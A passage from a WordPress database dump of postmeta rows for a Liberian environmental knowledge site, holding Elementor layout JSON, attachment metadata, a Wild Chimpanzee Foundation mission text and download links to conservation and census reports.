More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(21173,3083,'_thumbnail_id','3194'),(21174,3083,'_dp_original','1614'),(21175,3083,'_edit_lock','1629235931:42'),(21176,3083,'_edit_last','42'),(21177,3084,'_wp_attached_file','2020/06/WCF.jpg'),(21178,3084,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:850;s:6:\"height\";i:638;s:4:\"file\";s:15:\"2020/06/WCF.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"WCF-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"WCF-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"WCF-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21179,3085,'_elementor_edit_mode','builder'),(21180,3085,'_elementor_template_type','wp-post'),(21181,3085,'_elementor_version','2.8.1'),(21182,3085,'_wp_page_template','default'),(21183,3085,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Wild Chimpanzee Foundation\\u2019s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioural diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people<\\/p><p>WCF implements conservation projects in C\\u00f4te d\\u2019Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(21184,3085,'_thumbnail_id','3017'),(21185,3083,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(21186,3086,'_elementor_edit_mode','builder'),(21187,3086,'_elementor_template_type','wp-post'),(21188,3086,'_elementor_version','2.8.1'),(21189,3086,'_wp_page_template','default'),(21190,3086,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Wild Chimpanzee Foundation\\u2019s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioural diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people<\\/p><p>WCF implements conservation projects in C\\u00f4te d\\u2019Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(21191,3086,'_thumbnail_id','3084'),(21192,3086,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(21194,3083,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1628896516;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2769;}i:1;a:1:{s:2:\"id\";i:1612;}i:2;a:1:{s:2:\"id\";i:2965;}}}}'),(21195,3087,'_elementor_controls_usage','a:0:{}'),(21196,3087,'by','EPA'),(21197,3087,'year','2021'),(21198,3087,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/06/Final-Final-NEAP-@-April-19-2021.pdf'),(21199,3087,'_pods_cover_image','a:1:{i:0;i:573;}'),(21200,3087,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(21205,3087,'_dp_original','2751'),(21206,3087,'_edit_lock','1670324190:42'),(21207,3087,'_edit_last','38'),(21208,3088,'_wp_attached_file','2020/06/NEAP_3-Sept-2019-1-9-09-19-1.pdf'),(21216,3090,'_elementor_controls_usage','a:0:{}'),(21217,3090,'_thumbnail_id','3070'),(21218,3090,'ocean_gallery_link_images','off'),(21219,3090,'ocean_sidebar','0'),(21220,3090,'ocean_second_sidebar','0'),(21221,3090,'ocean_disable_margins','enable'),(21222,3090,'ocean_display_top_bar','default'),(21223,3090,'ocean_display_header','default'),(21224,3090,'ocean_center_header_left_menu','0'),(21225,3090,'ocean_custom_header_template','0'),(21226,3090,'ocean_header_custom_menu','0'),(21227,3090,'ocean_menu_typo_font_family','0'),(21228,3090,'ocean_disable_title','default'),(21229,3090,'ocean_disable_heading','default'),(21230,3090,'ocean_disable_breadcrumbs','default'),(21231,3090,'ocean_display_footer_widgets','default'),(21232,3090,'ocean_display_footer_bottom','default'),(21233,3090,'ocean_custom_footer_template','0'),(21234,3090,'ocean_link_format_target','self'),(21235,3090,'ocean_quote_format_link','post'),(21236,3090,'osh_disable_topbar_sticky','default'),(21237,3090,'osh_disable_header_sticky','default'),(21238,3090,'osh_sticky_header_style','default'),(21239,3090,'_dp_original','3072'),(21240,3090,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1627169378;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3069;}i:1;a:1:{s:2:\"id\";i:3045;}i:2;a:1:{s:2:\"id\";i:3066;}}}}'),(21241,3090,'_edit_lock','1598381832:42'),(21244,3090,'_edit_last','42'),(21245,3092,'_elementor_controls_usage','a:0:{}'),(21246,3092,'by','WCF'),(21247,3092,'year','February-June 2015'),(21248,3092,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/06/Biomonitoring_PGKNP_2015_FINAL_REPORT_small.pdf'),(21249,3092,'_pods_cover_image','a:1:{i:0;i:573;}'),(21250,3092,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(21255,3092,'_dp_original','2993'),(21256,3092,'_edit_lock','1670325102:42'),(21257,3092,'_edit_last','42'),(21258,3093,'_wp_attached_file','2020/06/FINAL_REPORT_GS_Corridor_Survey_2015.pdf'),(21264,3092,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628420950;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3096;}i:1;a:1:{s:2:\"id\";i:3097;}i:2;a:1:{s:2:\"id\";i:3226;}}}}'),(21265,3095,'_wp_attached_file','2020/06/Biomonitoring_PGKNP_2015_FINAL_REPORT_small.pdf'),(21267,3092,'_pods_attached_document','a:1:{i:0;i:3095;}'),(21279,3096,'_elementor_controls_usage','a:0:{}'),(21280,3096,'by','WCF'),(21281,3096,'year','May-July 2015'),(21282,3096,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/06/FINAL_REPORT_GS_Corridor_Survey_2015.pdf'),(21283,3096,'_pods_cover_image','a:1:{i:0;i:573;}'),(21284,3096,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(21289,3096,'_dp_original','3092'),(21290,3096,'_edit_lock','1670325180:42'),(21291,3096,'_edit_last','42'),(21293,3096,'_pods_attached_document','a:1:{i:0;i:3093;}'),(21297,3097,'_elementor_controls_usage','a:0:{}'),(21298,3097,'by','WCF'),(21299,3097,'year','2019'),(21300,3097,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/06/2020_WCF-Ann_Rep-2019-final_ENG_24-03-2020.pdf'),(21301,3097,'_pods_cover_image','a:1:{i:0;i:573;}'),(21302,3097,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(21307,3097,'_dp_original','3096'),(21308,3097,'_edit_lock','1670325038:42'),(21309,3097,'_edit_last','42'),(21310,3098,'_wp_attached_file','2020/06/2020_WCF-Ann_Rep-2019-final_ENG_24-03-2020.pdf'),(21312,3097,'_pods_attached_document','a:1:{i:0;i:3098;}'),(21331,3100,'_wp_attached_file','2020/06/tna-agriculture-report-liberia.pdf'),(21337,3096,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628276617;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3097;}i:1;a:1:{s:2:\"id\";i:3092;}i:2;a:1:{s:2:\"id\";i:3226;}}}}'),(21339,3087,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628511671;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1718;}i:1;a:1:{s:2:\"id\";i:2309;}i:2;a:1:{s:2:\"id\";i:3079;}}}}'),(21340,3097,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627411227;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3092;}i:1;a:1:{s:2:\"id\";i:3096;}i:2;a:1:{s:2:\"id\";i:3226;}}}}'),(21341,3102,'_elementor_controls_usage','a:0:{}'),(21342,3102,'by','WCF'),(21343,3102,'year','2008'),(21344,3102,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/07/2008-Census-Atlas.pdf'),(21345,3102,'_pods_cover_image','a:1:{i:0;i:573;}'),(21346,3102,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(21351,3102,'_dp_original','3097'),(21352,3102,'_edit_lock','1670325036:42'),(21353,3102,'_edit_last','42'),(21354,3103,'_wp_attached_file','2020/07/2008-Census-Atlas.pdf'),(21356,3102,'_pods_attached_document','a:1:{i:0;i:3103;}'),(21360,3104,'_elementor_controls_usage','a:0:{}'),(21361,3104,'by','MOA, LISGIS, FAO and 